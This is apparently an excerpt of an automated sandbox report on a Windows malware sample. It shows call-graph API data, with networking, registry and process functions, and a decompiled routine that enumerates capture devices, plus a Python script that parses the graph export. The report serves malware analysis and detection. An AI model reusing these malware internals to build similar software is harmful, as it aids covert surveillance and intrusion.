2d21ac9 21054->21055 21056 2d21bf2 21055->21056 21057 2d21ad2 CloseHandle GetCurrentProcess IsWow64Process 21055->21057 21056->20703 21058 2d21b01 21057->21058 21059 2d21af9 21057->21059 21581 2d218ba InitializeSecurityDescriptor 21058->21581 21576 2d1f7e0 21059->21576 21062 2d21b06 21063 2d21b19 GetModuleFileNameA 21062->21063 21587 2d21855 lstrlenA RegOpenKeyExA 21063->21587 21066 2d21855 5 API calls 21067 2d21b48 GetSystemDirectoryW lstrcatW ShellExecuteW 
ShellExecuteExW TerminateProcess 21066->21067 21068 2d21bd0 Sleep RegDeleteKeyA ExitProcess 21067->21068 21069 2d21bc8 21067->21069 21592 2d1f7b9 21069->21592 21072 2d11052 21071->21072 21073 2d21a51 GetModuleFileNameW IsUserAnAdmin 21072->21073 21074 2d21ab4 21073->21074 21075 2d21a68 21073->21075 21074->20703 21076 2d1fbfc 4 API calls 21075->21076 21077 2d21a6d 21076->21077 21077->21074 21603 2d219c9 RegOpenKeyExW 21077->21603 21079 2d21a78 21080 2d21a7d FindResourceW LoadResource SizeofResource LockResource 21079->21080 21080->21074 21081 2d21aad 21080->21081 21606 2d21936 21081->21606 21083->20733 21084->20721 21086 2d21fd3 21085->21086 21087 2d21f3a 21085->21087 21086->20710 21088 2d21fc3 21087->21088 21089 2d21f43 VirtualAlloc GetWindowsDirectoryA lstrlenA 21087->21089 21612 2d220b8 CreateToolhelp32Snapshot 21088->21612 21090 2d21f7a 21089->21090 21093 2d21f89 CreateProcessA 21090->21093 21092 2d21fc8 21092->21086 21619 2d21fd8 OpenProcess GetCurrentProcessId 21092->21619 21093->21086 21094 2d21fb3 Sleep 21093->21094 21094->21092 21098 2d14e76 21096->21098 21097 2d15c6d lstrlenW lstrcpyW VirtualAlloc 21097->21098 21098->21097 21099 2d13554 11 API calls 21098->21099 21101 2d15ea5 VirtualFree 21098->21101 21102 2d14ec7 Sleep 21098->21102 21627 2d157fb 21098->21627 21638 2d1562f 21098->21638 21099->21098 21101->21098 21102->21098 21104 2d14ee2 21102->21104 21104->20721 21837 2d15ea5 VirtualFree 21105->21837 21107 2d14bd4 21108 2d15c16 3 API calls 21107->21108 21109 2d14bdf WSACleanup 21108->21109 21836 2d20283 ReleaseMutex FindCloseChangeNotification 21109->21836 21112 2d1556c 21113 2d13036 2 API calls 21112->21113 21114 2d15574 21113->21114 21115 2d13036 2 API calls 21114->21115 21116 2d1557c 21115->21116 21117->20739 21206 2d1fece 21118->21206 21122 2d20477 21122->20747 21124 2d20362 21123->21124 21125 2d15a42 21123->21125 21124->21125 21126 2d20381 21124->21126 21127 2d203df 21124->21127 21136 2d133bf lstrlenA 21125->21136 21211 2d12f91 21126->21211 
21127->21125 21129 2d12f91 6 API calls 21127->21129 21130 2d203fd 21129->21130 21130->21125 21132 2d20ac3 6 API calls 21130->21132 21135 2d12296 6 API calls 21130->21135 21132->21130 21134 2d20397 21134->21125 21214 2d20ac3 21134->21214 21218 2d12296 21134->21218 21135->21130 21137 2d133d2 lstrlenA 21136->21137 21138 2d133ee 21136->21138 21240 2d15e22 VirtualAlloc 21137->21240 21141 2d202b9 21138->21141 21140 2d133e2 lstrcpyA 21140->21138 21145 2d202cb 21141->21145 21150 2d15a5f 21141->21150 21144 2d133bf 4 API calls 21144->21145 21145->21144 21148 2d13036 2 API calls 21145->21148 21149 2d20330 21145->21149 21145->21150 21242 2d15ca3 LoadLibraryA GetProcAddress 21145->21242 21247 2d20af9 21145->21247 21250 2d133a3 lstrcmpA 21145->21250 21251 2d15ea5 VirtualFree 21145->21251 21148->21145 21252 2d1239e 21149->21252 21152 2d15ea5 VirtualFree 21150->21152 21152->20755 21257 2d15eff GetProcessHeap RtlAllocateHeap 21153->21257 21155 2d1305e 21155->20757 21157 2d12eab 21156->21157 21159 2d12eb0 21156->21159 21258 2d15eff GetProcessHeap RtlAllocateHeap 21157->21258 21159->20759 21259 2d12e4c 21160->21259 21163 2d1304c 2 API calls 21164 2d15991 21163->21164 21266 2d15911 21164->21266 21169 2d13036 2 API calls 21170 2d159ae 21169->21170 21171 2d21dc0 21170->21171 21172 2d21dd4 21171->21172 21182 2d15aa3 21171->21182 21289 2d11085 GetProcessHeap RtlAllocateHeap 21172->21289 21174 2d21ddf 21290 2d135e5 lstrlenW 21174->21290 21176 2d21e02 21177 2d13437 3 API calls 21176->21177 21178 2d21e0a 21177->21178 21295 2d15ea5 VirtualFree 21178->21295 21180 2d21e12 21296 2d11099 GetProcessHeap HeapFree 21180->21296 21183 2d13437 21182->21183 21184 2d13462 21183->21184 21185 2d13449 21183->21185 21190 2d15ea5 VirtualFree 21184->21190 21299 2d13384 21185->21299 21187 2d13450 21188 2d15e22 VirtualAlloc 21187->21188 21189 2d13457 lstrcpyW 21188->21189 21189->21184 21190->20769 21191->20775 21192->20781 21193->20787 21194->20793 21302 2d20125 21195->21302 21199 2d1fefd 21306 2d15ea5 
VirtualFree 21199->21306 21201 2d15bec 21201->20804 21203 2d11e94 21202->21203 21205 2d11e83 21202->21205 21203->20798 21204 2d13036 2 API calls 21204->21205 21205->21203 21205->21204 21210 2d20298 CreateMutexA 21206->21210 21208 2d1fede 21209 2d15f53 GetProcessHeap HeapAlloc 21208->21209 21209->21122 21210->21208 21230 2d15ec5 21211->21230 21213 2d12fa7 21213->21134 21215 2d20adc 21214->21215 21216 2d12f91 6 API calls 21215->21216 21217 2d20af1 21216->21217 21217->21134 21219 2d122b0 21218->21219 21220 2d12364 21218->21220 21239 2d15f53 GetProcessHeap HeapAlloc 21219->21239 21222 2d12e93 2 API calls 21220->21222 21223 2d1238c 21222->21223 21224 2d13036 2 API calls 21223->21224 21226 2d12397 21224->21226 21225 2d122d9 21225->21225 21228 2d12e93 2 API calls 21225->21228 21229 2d12355 21225->21229 21226->21134 21227 2d11e71 2 API calls 21227->21220 21228->21225 21229->21220 21229->21227 21231 2d15ed0 21230->21231 21232 2d15ec9 GetProcessHeap RtlAllocateHeap 21230->21232 21234 2d15ed4 21231->21234 21235 2d15edc GetProcessHeap HeapReAlloc 21231->21235 21232->21213 21238 2d15eee GetProcessHeap RtlFreeHeap 21234->21238 21235->21213 21237 2d15ed9 21237->21213 21238->21237 21239->21225 21241 2d15e40 21240->21241 21241->21140 21243 2d15ce1 21242->21243 21244 2d15cc2 21242->21244 21243->21145 21245 2d15cc6 21244->21245 21246 2d15cd9 ExitProcess 21244->21246 21245->21246 21248 2d12e93 2 API calls 21247->21248 21249 2d20b21 21248->21249 21249->21145 21250->21145 21251->21145 21253 2d15ca3 3 API calls 21252->21253 21254 2d123b3 21253->21254 21255 2d20af9 2 API calls 21254->21255 21256 2d123c1 21255->21256 21256->21150 21257->21155 21258->21159 21287 2d15eff GetProcessHeap RtlAllocateHeap 21259->21287 21261 2d12e5b 21262 2d12f91 6 API calls 21261->21262 21263 2d12e84 21262->21263 21288 2d15eee GetProcessHeap RtlFreeHeap 21263->21288 21265 2d12e8b 21265->21163 21267 2d15923 21266->21267 21275 2d15945 21266->21275 21268 2d12e4c 8 API calls 21267->21268 21270 2d15935 21268->21270 
[Call-graph edge data (node id, function address, API names or "N API calls", and "A->B" edges) for the executed functions of the sample; the rendered graph itself is not reproduced here. Functions in this data that call Windows APIs directly include, for networking: 2d158f6 (WSAStartup), 2d15824 (getaddrinfo), 2d15852 (socket), 2d1586d (htons, freeaddrinfo, connect), 2d1564b (setsockopt), 2d156a9 and 2d15713 (recv); for synchronisation: 2d20298 and 2d1fece (CreateMutexA), 2d2026f (WaitForSingleObject), 2d20283 and 2d158c2 (ReleaseMutex), 2d1fdb7 (CreateEventA), 2d1e703 and 2d1189e (InitializeCriticalSection); for the registry: 2d210b1 and 2d1f731 (RegOpenKeyExW), 2d2108c, 2d20f6e and 2d219f3 (RegCreateKeyExW), 2d218e5 (RegCreateKeyExA, preceded by SetSecurityDescriptorDacl in 2d218d1), 2d20fc3 and 2d20ff8 (RegQueryValueExW), 2d21043 and 2d21a0c (RegSetValueExW), 2d2188f (RegSetValueExA); for process and file-system discovery: 2d220e3 (Process32First), 2d22113 (Process32Next), 2d1f493 (GetModuleFileNameW), 2d2200e (GetModuleFileNameA), 2d1105a (SHGetSpecialFolderPathW), 2d1f71f (SHCreateDirectoryExW), 2d131f6 (ExpandEnvironmentStringsW), 2d21949 (VirtualProtect, VirtualAlloc, GetWindowsDirectoryW), 2d21d5c (WriteFile); for import resolution and evasion: 2d2094e (GetPEB), 2d20c36 (GetModuleHandleA, GetProcAddress), 2d199e3 (LoadLibraryW), 2d21d0c (Sleep, GetTickCount); for COM: 2d2290f, 2d2273a and 2d22447 (CoInitialize, CoCreateInstance), 2d22a7d and 2d227b9 (CoCreateInstance), 2d22996 (VariantInit), 2d224f6 (CoTaskMemFree), 2d22a40, 2d228aa and 2d224df (CoUninitialize). The remaining nodes are heap, memory and string helpers: 2d11085 (GetProcessHeap, RtlAllocateHeap), 2d11099 (GetProcessHeap, HeapFree), 2d15f53 and 2d15df1 (GetProcessHeap, HeapAlloc), 2d15eee (GetProcessHeap, RtlFreeHeap), 2d131c3, 2d15e22 and 2d15eb4 (VirtualAlloc), 2d15ea5 (VirtualFree), 2d15e10 (VirtualQuery), 2d13578 and 2d135a2 (WideCharToMultiByte), 2d130c1 and 2d130e5 (MultiByteToWideChar), plus lstrlen/lstrcpy/lstrcat/lstrcmp wrappers.]

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph of E02D2290F, basic blocks (id, address range, API calls or callees, successors):
                                                                    284  2d2290f-2d22949  CoInitialize CoCreateInstance  -> 285, 286
                                                                    285  2d22a66-2d22a6a  (no successors: function exit)
                                                                    286  2d2294f-2d2295b  -> 287
                                                                    287  2d2295f-2d22964  -> 285, 288
                                                                    288  2d2296a-2d22972  -> 290
                                                                    290  2d22a22-2d22a3a  -> 292, 293
                                                                    292  2d22a40-2d22a45  -> 294, 295
                                                                    293  2d22977-2d22990  -> 292, 300
                                                                    294  2d22a50-2d22a55  -> 296, 297
                                                                    295  2d22a47-2d22a4d  -> 294
                                                                    296  2d22a60          CoUninitialize  -> 285
                                                                    297  2d22a57-2d22a5d  -> 296
                                                                    300  2d22996-2d229b5  VariantInit  -> 303, 304
                                                                    303  2d229b7-2d229cc  -> 292, 304
                                                                    304  2d229ce-2d229d8  call 2d15f53  -> 308, 309
                                                                    308  2d229e5          -> 311
                                                                    309  2d229da-2d229e3  call 2d22bc7  -> 311
                                                                    311  2d229e7-2d229f0  -> 313, 314
                                                                    313  2d229f2          -> 315
                                                                    314  2d22a10-2d22a20  call 2d12481  -> 290
                                                                    315  2d229f4-2d22a0e  -> 314, 315
                                                                    C-Code - Quality: 59%
                                                                    			// Sandbox decompilation of E02D2290F; the comments below name the COM vtable slots by
                                                                    			// their byte offset. The slot layout and the property names "Description" /
                                                                    			// "FriendlyName" are consistent with DirectShow device enumeration
                                                                    			// (ICreateDevEnum -> IEnumMoniker -> IMoniker::BindToStorage -> IPropertyBag::Read);
                                                                    			// the GUIDs themselves sit at the data addresses shown and are not reproduced here.
                                                                    			E02D2290F(intOrPtr __ecx) {
                                                                    				signed int _v8;
                                                                    				signed int _v12;
                                                                    				void* _v16;
                                                                    				signed int _v20;
                                                                    				char _v24;
                                                                    				intOrPtr _v28;
                                                                    				signed short* _v36;
                                                                    				char _v44;
                                                                    				signed int* _t43;
                                                                    				intOrPtr* _t47;
                                                                    				void* _t48;
                                                                    				intOrPtr* _t50;
                                                                    				intOrPtr* _t54;
                                                                    				signed int _t57;
                                                                    				char _t60;
                                                                    				signed int _t61;
                                                                    				intOrPtr* _t63;
                                                                    				signed int _t64;
                                                                    				intOrPtr* _t66;
                                                                    				intOrPtr* _t67;
                                                                    				intOrPtr* _t70;
                                                                    				intOrPtr* _t71;
                                                                    				void* _t73;
                                                                    				signed int _t76;
                                                                    				signed int _t85;
                                                                    				signed int _t87;
                                                                    				signed short* _t88;
                                                                    
                                                                    				_t87 = 0;
                                                                    				_v28 = __ecx;                      // this-pointer of the caller's object; the device list hangs off +4
                                                                    				__imp__CoInitialize(0);
                                                                    				_t43 =  &_v12;
                                                                    				_v16 = 0;
                                                                    				_v12 = 0;
                                                                    				_v8 = 0;
                                                                    				// CoCreateInstance(CLSID at 0x2d245e0, NULL, CLSCTX_INPROC_SERVER (1), IID at 0x2d273f0, &_v12)
                                                                    				__imp__CoCreateInstance(0x2d245e0, 0, 1, 0x2d273f0, _t43); // executed
                                                                    				_t66 = _v12;
                                                                    				if(_t66 != 0) {
                                                                    					// slot 3 (+0xc): ICreateDevEnum::CreateClassEnumerator(category GUID at 0x2d245d0, &_v8, 0)
                                                                    					_t43 =  *((intOrPtr*)( *_t66 + 0xc))(_t66, 0x2d245d0,  &_v8, 0);
                                                                    					_t67 = _v8;
                                                                    					if(_t67 != 0) {
                                                                    						 *((intOrPtr*)( *_t67 + 0x14))(_t67);   // slot 5 (+0x14): IEnumMoniker::Reset
                                                                    						_t64 = 0;                                // running device index
                                                                    						while(1) {
                                                                    							_t47 = _v8;
                                                                    							_v20 = _t87;
                                                                    							// slot 3 (+0xc): IEnumMoniker::Next(1, &moniker, &fetched); S_FALSE ends the loop
                                                                    							_t48 =  *((intOrPtr*)( *_t47 + 0xc))(_t47, 1,  &_v24,  &_v20);
                                                                    							if(_t48 != 0) {
                                                                    								break;
                                                                    							}
                                                                    							_t50 = _v24 + _t64 * 4;                  // decompiler output; _v24 holds the moniker returned by Next
                                                                    							// slot 9 (+0x24): IMoniker::BindToStorage(NULL, NULL, IID at 0x2d24560, &_v16) -> property bag
                                                                    							_t48 =  *((intOrPtr*)( *_t50 + 0x24))(_t50, _t87, _t87, 0x2d24560,  &_v16);
                                                                    							if(_t48 != 0) {
                                                                    								break;
                                                                    							}
                                                                    							__imp__#8( &_v44);                         // oleaut32 ordinal 8: VariantInit(&var)
                                                                    							_t54 = _v16;
                                                                    							_push(_t87);
                                                                    							_push( &_v44);
                                                                    							_push(L"Description");
                                                                    							_push(_t54);
                                                                    							// slot 3 (+0xc): IPropertyBag::Read(L"Description", &var, NULL)
                                                                    							if( *((intOrPtr*)( *_t54 + 0xc))() == 0) {
                                                                    								L6:
                                                                    								// 0x1c-byte device record (E02D15F53 wraps GetProcessHeap/HeapAlloc) with
                                                                    								// two name buffers allocated by E02D22BC7: a narrow one at +0, a wide one at +4
                                                                    								_t73 = 0x1c;
                                                                    								if(E02D15F53(_t73) == 0) {
                                                                    									_t85 = _t87;
                                                                    								} else {
                                                                    									_t85 = E02D22BC7(_t56);
                                                                    								}
                                                                    								_t88 = _v36;                             // VARIANT.bstrVal (offset 8): device name as UTF-16
                                                                    								_t57 =  *_t88 & 0x0000ffff;
                                                                    								if(_t57 == 0) {
                                                                    									L12:
                                                                    									 *(_t85 + 8) = _t64;                  // record the device index
                                                                    									E02D12481(_v28 + 4, _t85);            // append the record to the list at this+4
                                                                    									_t64 = _t64 + 1;
                                                                    									_t87 = 0;
                                                                    									continue;                             // neither moniker, property bag nor VARIANT is released
                                                                    								} else {
                                                                    									_t76 = _t57;
                                                                    									// copy the name into the wide buffer and, truncated to one byte per
                                                                    									// UTF-16 code unit, into the narrow buffer
                                                                    									do {
                                                                    										 *( *((intOrPtr*)(_t85 + 4)) + _t87 * 2) = _t76;
                                                                    										_t60 =  *_t88;
                                                                    										_t88 =  &(_t88[1]);
                                                                    										 *((char*)(_t87 +  *_t85)) = _t60;
                                                                    										_t87 = _t87 + 1;
                                                                    										_t61 =  *_t88 & 0x0000ffff;
                                                                    										_t76 = _t61;
                                                                    									} while (_t61 != 0);
                                                                    									goto L12;
                                                                    								}
                                                                    							}
                                                                    							_t63 = _v16;
                                                                    							// fallback: IPropertyBag::Read(L"FriendlyName", &var, NULL); any failure leaves the loop
                                                                    							_t48 =  *((intOrPtr*)( *_t63 + 0xc))(_t63, L"FriendlyName",  &_v44, _t87);
                                                                    							if(_t48 != 0) {
                                                                    								break;
                                                                    							}
                                                                    							goto L6;
                                                                    						}
                                                                    						_t70 = _v8;
                                                                    						if(_t70 != 0) {
                                                                    							_t48 =  *((intOrPtr*)( *_t70 + 8))(_t70);   // slot 2 (+8): IUnknown::Release on the class enumerator
                                                                    							_v8 = _t87;
                                                                    						}
                                                                    						_t71 = _v12;
                                                                    						if(_t71 != 0) {
                                                                    							_t48 =  *((intOrPtr*)( *_t71 + 8))(_t71);   // slot 2 (+8): IUnknown::Release on the device enumerator
                                                                    							_v12 = _t87;
                                                                    						}
                                                                    						__imp__CoUninitialize();
                                                                    						return _t48;
                                                                    					}
                                                                    				}
                                                                    				return _t43;
                                                                    			}
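The call-graph and control-flow-graph figures above are exported by the report as flat token streams (node id, address, annotation words, and `A->B` edges). The following script is an added example, not code from the Joe Sandbox report or from the analysed sample: it parses that stream, recovers the loops of a function from its back edges, and lists the API calls each loop contains. Run on the block data for E02D2290F it finds the loop closed by `314->290`, which is the `while(1)` over the device enumerator in the decompiled listing above, and the self-loop on block 315, which is the `do { } while` that copies the device name. The token grammar is inferred from the data on this page and is an assumption; the two embedded inputs are copied from the graph data shown above.

```python
# Added example: parse Joe Sandbox graph token streams and recover loops / API-bearing blocks.
# Grammar (inferred from this page, an assumption): a decimal token followed by a hex address or
# "start-end" range opens a node; the words up to the next node annotate it (API names,
# "N API calls", "call <addr>"); tokens of the form "A->B" are edges and may name nodes
# that lie outside the exported excerpt.
import re
from collections import deque
from dataclasses import dataclass, field

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
# Addresses here are hex; demanding a hex letter or a range keeps them apart from
# decimal node ids and from the "N" in "N API calls".
ADDR_RE = re.compile(r"^(?=.*[a-f-])[0-9a-f]{6,8}(?:-[0-9a-f]{6,8})?$")
NOISE = {"API", "calls", "call"}

# Constructed input: the block/edge line for E02D2290F, copied from this report.
CFG_TEXT = (
    "control_flow_graph 284 2d2290f-2d22949 CoInitialize CoCreateInstance 285 2d22a66-2d22a6a "
    "284->285 286 2d2294f-2d2295b 284->286 287 2d2295f-2d22964 286->287 287->285 "
    "288 2d2296a-2d22972 287->288 290 2d22a22-2d22a3a 288->290 292 2d22a40-2d22a45 290->292 "
    "293 2d22977-2d22990 290->293 294 2d22a50-2d22a55 292->294 295 2d22a47-2d22a4d 292->295 "
    "293->292 300 2d22996-2d229b5 VariantInit 293->300 296 2d22a60 CoUninitialize 294->296 "
    "297 2d22a57-2d22a5d 294->297 295->294 296->285 297->296 303 2d229b7-2d229cc 300->303 "
    "304 2d229ce-2d229d8 call 2d15f53 300->304 303->292 303->304 308 2d229e5 304->308 "
    "309 2d229da-2d229e3 call 2d22bc7 304->309 311 2d229e7-2d229f0 308->311 309->311 "
    "313 2d229f2 311->313 314 2d22a10-2d22a20 call 2d12481 311->314 315 2d229f4-2d22a0e "
    "313->315 314->290 315->314 315->315"
)
# Constructed input: a few nodes from the call-graph data on this page.
CALLGRAPH_TEXT = (
    "21404 2d131c3 VirtualAlloc 21403->21404 21405 2d158dc 21426 2d20298 CreateMutexA "
    "21405->21426 21407 2d158f6 WSAStartup 21407->20867 21409 2d1304c 2 API calls 21408->21409"
)


@dataclass
class Node:
    nid: int
    addr: str
    notes: list = field(default_factory=list)

    def apis(self):
        """Windows API names written directly on the node ("N API calls" is not one)."""
        return [t for t in self.notes
                if t not in NOISE and not t.isdigit() and not ADDR_RE.match(t)]

    def callees(self):
        """Function addresses from "call <addr>" annotations."""
        return [t for p, t in zip(self.notes, self.notes[1:]) if p == "call"]


def parse_graph(text):
    """Return ({node id: Node}, {(src, dst)}) for one graph's token stream."""
    toks = text.split()
    nodes, edges, cur, i = {}, set(), None, 0
    while i < len(toks):
        tok = toks[i]
        m = EDGE_RE.match(tok)
        if m:
            edges.add((int(m[1]), int(m[2])))
        elif tok.isdigit() and i + 1 < len(toks) and ADDR_RE.match(toks[i + 1]):
            cur = nodes[int(tok)] = Node(int(tok), toks[i + 1])
            i += 1                      # the address token is consumed here
        elif cur is not None:           # tokens before the first node are ignored
            cur.notes.append(tok)
        i += 1
    return nodes, edges


def _adjacency(edges, reverse=False):
    adj = {}
    for a, b in edges:
        adj.setdefault(b if reverse else a, []).append(a if reverse else b)
    return adj


def back_edges(edges, entry):
    """Edges whose target is still on the DFS stack: one per loop in structured code."""
    succ, state, found = _adjacency(edges), {}, set()

    def visit(n):
        state[n] = "active"
        for s in sorted(succ.get(n, [])):
            if state.get(s) == "active":
                found.add((n, s))
            elif s not in state:
                visit(s)
        state[n] = "done"

    visit(entry)
    return found


def natural_loop(edges, tail, head):
    """Loop closed by tail->head: head plus every block reaching tail without passing head."""
    pred, body, work = _adjacency(edges, reverse=True), {head}, deque()
    if tail != head:
        body.add(tail)
        work.append(tail)
    while work:
        for p in pred.get(work.popleft(), []):
            if p not in body:
                body.add(p)
                work.append(p)
    return body


if __name__ == "__main__":
    nodes, edges = parse_graph(CFG_TEXT)
    print(f"{len(nodes)} blocks, {len(edges)} edges")
    for tail, head in sorted(back_edges(edges, 284)):
        body = natural_loop(edges, tail, head)
        apis = sorted(a for n in body for a in nodes[n].apis())
        print(f"loop {nodes[head].addr} <- {nodes[tail].addr}: {len(body)} blocks, APIs inside: {apis}")
```

The outer loop body comes out as eleven blocks and contains the VariantInit block, so every device iteration touches the property bag; the exit path through blocks 292/294/296 (CoUninitialize) lies outside both loops, which is what the `break` statements in the listing express. The same parser reads the call-graph stream, so the per-function API list in the placeholder above can be regenerated from the raw export rather than by hand.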
                                                                    0x00000000
                                                                    0x02d2299a
                                                                    0x02d229a0
                                                                    0x02d229a6
                                                                    0x02d229a7
                                                                    0x02d229a8
                                                                    0x02d229af
                                                                    0x02d229b5
                                                                    0x02d229ce
                                                                    0x02d229d0
                                                                    0x02d229d8
                                                                    0x02d229e5
                                                                    0x02d229da
                                                                    0x02d229e1
                                                                    0x02d229e1
                                                                    0x02d229e7
                                                                    0x02d229ea
                                                                    0x02d229f0
                                                                    0x02d22a10
                                                                    0x02d22a14
                                                                    0x02d22a1a
                                                                    0x02d22a1f
                                                                    0x02d22a20
                                                                    0x00000000
                                                                    0x02d229f2
                                                                    0x02d229f2
                                                                    0x02d229f4
                                                                    0x02d229f7
                                                                    0x02d229fd
                                                                    0x02d229ff
                                                                    0x02d22a02
                                                                    0x02d22a05
                                                                    0x02d22a06
                                                                    0x02d22a09
                                                                    0x02d22a0b
                                                                    0x00000000
                                                                    0x02d229f4
                                                                    0x02d229f0
                                                                    0x02d229b7
                                                                    0x02d229c7
                                                                    0x02d229cc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d229cc
                                                                    0x02d22a40
                                                                    0x02d22a45
                                                                    0x02d22a4a
                                                                    0x02d22a4d
                                                                    0x02d22a4d
                                                                    0x02d22a50
                                                                    0x02d22a55
                                                                    0x02d22a5a
                                                                    0x02d22a5d
                                                                    0x02d22a5d
                                                                    0x02d22a60
                                                                    0x00000000
                                                                    0x02d22a60
                                                                    0x02d22964
                                                                    0x02d22a6a

                                                                    APIs
                                                                    • CoInitialize.OLE32(00000000), ref: 02D2291E
                                                                    • CoCreateInstance.OLE32(02D245E0,00000000,00000001,02D273F0,?,?,?,?,02D22F37,?,?,?,02D2227B), ref: 02D2293E
                                                                    • VariantInit.OLEAUT32(?), ref: 02D2299A
                                                                    • CoUninitialize.OLE32(?,?,?,02D22F37,?,?,?,02D2227B), ref: 02D22A60
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateInitInitializeInstanceUninitializeVariant
                                                                    • String ID: Description$FriendlyName
                                                                    • API String ID: 4142528535-3192352273
                                                                    • Opcode ID: 9f2eaaeb9e15ae78bd67182794a815b7c7aaa9c3c26c1ffc90fe27b210ad4ad0
                                                                    • Instruction ID: 53b1320526aa52d3e48a97df93b280309f9e8c42839a3b6a2266b18f39ce53d3
                                                                    • Opcode Fuzzy Hash: 9f2eaaeb9e15ae78bd67182794a815b7c7aaa9c3c26c1ffc90fe27b210ad4ad0
                                                                    • Instruction Fuzzy Hash: B4415F74A40215AFDB24DFA5D888DAEBBB9EF98708B14445DF842EB350DB70DE05CB60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(?), ref: 00553C9A
                                                                    • GetProcAddress.KERNEL32(?,00550FF9), ref: 00553CB8
                                                                    • ExitProcess.KERNEL32(?,00550FF9), ref: 00553CC9
                                                                    • VirtualProtect.KERNEL32(00400000,00001000,00000004,?,00000000), ref: 00553D20
                                                                    • VirtualProtect.KERNEL32(00400000,00001000), ref: 00553D35
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                    • String ID:
                                                                    • API String ID: 1996367037-0
                                                                    • Opcode ID: 18a66460aa6468ff1edf68559dab2d8afdd706d358a0308808a19eab16187e1a
                                                                    • Instruction ID: 64443ad41b183cbc27e7b15718d6566a5c590f0b0c505bdb3da6e7c3dd8ff032
                                                                    • Opcode Fuzzy Hash: 18a66460aa6468ff1edf68559dab2d8afdd706d358a0308808a19eab16187e1a
                                                                    • Instruction Fuzzy Hash: 58610B71A442525BD7208A78CCE0660BFA0FF513B27280B7ACDEAD73C5E7A45E0D8760
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00007F5E,00407C29), ref: 00407F57
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: c1d0115d781149f98acdd113d359e2029f14d1e83f0f557cfb56ddd92ebe6065
                                                                    • Instruction ID: 9a0e7f2bd3064cf6d77b813ca09d3913d3753a8899137a024509c302e72e5e7e
                                                                    • Opcode Fuzzy Hash: c1d0115d781149f98acdd113d359e2029f14d1e83f0f557cfb56ddd92ebe6065
                                                                    • Instruction Fuzzy Hash:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 95%
                                                                    			E02D23457(void* __eflags) {
                                                                    				char _v592;
                                                                    				char _v608;
                                                                    				char _v1120;
                                                                    				short _v1140;
                                                                    				char _v1372;
                                                                    				intOrPtr _v1484;
                                                                    				char _v1488;
                                                                    				char _v1500;
                                                                    				char _v1504;
                                                                    				char _v1520;
                                                                    				intOrPtr _v1532;
                                                                    				intOrPtr _v1536;
                                                                    				intOrPtr _v1544;
                                                                    				intOrPtr _v1552;
                                                                    				intOrPtr _v1568;
                                                                    				intOrPtr _v1576;
                                                                    				char _v1580;
                                                                    				char _v1584;
                                                                    				intOrPtr _v1588;
                                                                    				int _v1592;
                                                                    				char _v1600;
                                                                    				char _v1604;
                                                                    				char _v1608;
                                                                    				void* _v1612;
                                                                    				char _v1616;
                                                                    				char _v1620;
                                                                    				char _v1632;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* _t56;
                                                                    				void* _t98;
                                                                    				void* _t100;
                                                                    				void* _t101;
                                                                    				CHAR* _t114;
                                                                    				char* _t121;
                                                                    				CHAR* _t127;
                                                                    				void* _t131;
